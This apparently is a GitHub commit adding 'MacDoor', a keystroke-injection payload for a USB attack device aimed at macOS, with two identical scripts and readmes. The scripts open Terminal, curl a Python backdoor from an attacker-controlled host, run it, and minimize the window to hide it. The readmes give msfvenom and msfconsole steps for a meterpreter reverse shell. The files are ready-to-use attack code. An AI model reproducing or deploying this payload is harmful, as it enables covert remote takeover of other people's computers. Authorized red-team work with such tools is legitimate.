Skip to content

Commit

Permalink
Create MacDoor - A Python Backdoor for MacOS (#662)
Browse files Browse the repository at this point in the history
* Add files via upload

* Update readme.md

* Add files via upload

* Update readme.md

* Update payload.txt
  • Loading branch information
afsh4ck authored Aug 30, 2023
1 parent 8565790 commit 5ec9376
Show file tree
Hide file tree
Showing 4 changed files with 154 additions and 0 deletions.
47 changes: 47 additions & 0 deletions payloads/library/execution/MacDoor/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
#!/bin/bash
#
# Title: MacDoor
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Execution
#
# Steps:
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
# Step 2: mount a local server 'python3 -m http.server'
# Step 3: msfconsole multi/handler listener open before the attack.
#
# Note:
# You need to modify the script with your attacker IP and the port or your local server.
#
# Purple.............Setup
# Yellow blink.......Attack Mode ON
# Green..............Finish

LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
LED ATTACK

# Open terminal
QUACK GUI SPACE
QUACK DELAY 500
QUACK STRING Terminal
QUACK ENTER
QUACK DELAY 3000

# Execute attack
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd Downloads
QUACK ENTER
QUACK STRING python3 backdoor.py
QUACK ENTER

# Minimize terminal
QUACK GUI m
QUACK DELAY 2000

# Standby
LED FINISH
30 changes: 30 additions & 0 deletions payloads/library/execution/MacDoor/readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
# MacDoor - Python Backdoor Execution for the BashBunny

```
__ ___ ____
/ |/ /____ _ _____ / __ \ ____ ____ _____
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
```

* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Execution

# DESCRIPTION

Download a Python backdoor from our server, run it in terminal and minimize the terminal window.

# STEPS

* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
* Step 2: mount a local server 'python3 -m http.server'
* Step 3: msfconsole multi/handler listener open before the attack.

# NOTE

* You need to modify the script with your attacker IP and the port or your local server.

47 changes: 47 additions & 0 deletions payloads/library/remote_access/MacDoor/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
#!/bin/bash
#
# Title: MacDoor
# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window.
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Remote Access
#
# Steps:
# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
# Step 2: mount a local server 'python3 -m http.server'
# Step 3: msfconsole multi/handler listener open before the attack.
#
# Note:
# You need to modify the script with your attacker IP and the port or your local server.
#
# Purple.............Setup
# Yellow blink.......Attack Mode ON
# Green..............Finish

LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
LED ATTACK

# Open terminal
QUACK GUI SPACE
QUACK DELAY 500
QUACK STRING Terminal
QUACK ENTER
QUACK DELAY 3000

# Execute attack
QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd Downloads
QUACK ENTER
QUACK STRING python3 backdoor.py
QUACK ENTER

# Minimize terminal
QUACK GUI m
QUACK DELAY 2000

# Standby
LED FINISH
30 changes: 30 additions & 0 deletions payloads/library/remote_access/MacDoor/readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
# MacDoor - Python Backdoor Execution for MacOS

```
__ ___ ____
/ |/ /____ _ _____ / __ \ ____ ____ _____
/ /|_/ // __ `// ___// / / // __ \ / __ \ / ___/
/ / / // /_/ // /__ / /_/ // /_/ // /_/ // /
/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/
```

* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Remote Access

# DESCRIPTION

Download a Python backdoor from our server, run it in terminal and minimize the terminal window.

# STEPS

* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py
* Step 2: mount a local server 'python3 -m http.server'
* Step 3: msfconsole multi/handler listener open before the attack.

# NOTE

* You need to modify the script with your attacker IP and the port or your local server.

0 comments on commit 5ec9376

Please sign in to comment.